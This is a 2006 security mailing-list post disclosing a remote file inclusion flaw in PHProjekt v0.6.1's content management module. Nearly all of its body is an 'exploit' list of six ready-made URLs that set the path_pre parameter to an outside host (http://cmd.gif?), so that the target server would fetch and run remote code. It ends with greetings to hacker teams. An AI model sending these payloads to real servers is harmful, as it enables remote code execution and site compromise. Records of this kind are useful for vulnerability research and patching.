Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

faille include in "VeriTECH"  isreal

BlackBoard Multiple Vulnerabilities (XSS)

PHlyMail Lite [PM_[path][lib]=] Remote File Include Vulnerability

Tons of SQL-injections and XSS in Eichhorn Portal and vendor page

From:	D3nGeR_(at)_Gmail.CoM <D3nGeR_(at)_Gmail.CoM>
Date:	23.08.2006
Subject:	PHProjekt v0.6.1 Remote File Inclusion Vulnerability (2)

########################################################################
#  Content management module for PHProjekt v0.6.1  Remote File Inclusion Vulnerability (2)
#
#
#  Found By: D3nGeR
# E-Mail: D3nGeR@Gmail.CoM
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/cm_lib.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/doc/br.edithelp.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/doc/de.edithelp.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/doc/ct.edithelp.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/userrating.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/listing.php?path_pre=http://cmd.gif?
########################################################################
# Greetz To:
# Team-Evil & Aria-Security Team & D.O.M Team & H@rD Luck Team & IHST TeaM
########################################################################